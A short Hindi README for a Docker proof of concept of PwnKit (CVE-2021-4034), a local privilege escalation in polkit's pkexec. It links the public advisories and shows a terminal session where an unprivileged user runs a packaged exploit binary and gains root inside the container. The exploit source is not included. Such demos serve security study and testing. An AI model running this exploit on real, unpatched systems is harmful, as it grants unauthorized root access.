
# CVE-2021-4034 (PwnKit) के लिए डॉकराइज़्ड प्रूफ-ऑफ-कॉन्सेप्ट polkit के pkexec में स्थानीय विशेषाधिकार वृद्धि, जो एक अन-प्रिविलेज्ड उपयोगकर्ता से रूट एक्सेस प्रदर्शित करती है।
PwnKit के लिए डॉकर PoC: polkit के pkexec में स्थानीय विशेषाधिकार वृद्धि भेद्यता (CVE-2021-4034)
https://seclists.org/oss-sec/2022/q1/80
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
कंटेनर चलाने के लिए:
user@debian:~$ docker run -it --rm baconspider/cve-2021-4034 bash
low@35bbe8a7ac93:/opt/test$ id
uid=1000(low) gid=1000(low) groups=1000(low)
low@35bbe8a7ac93:/opt/test$ ./pwnkit
root@35bbe8a7ac93:/opt/test# id
uid=0(root) gid=0(root) groups=0(root)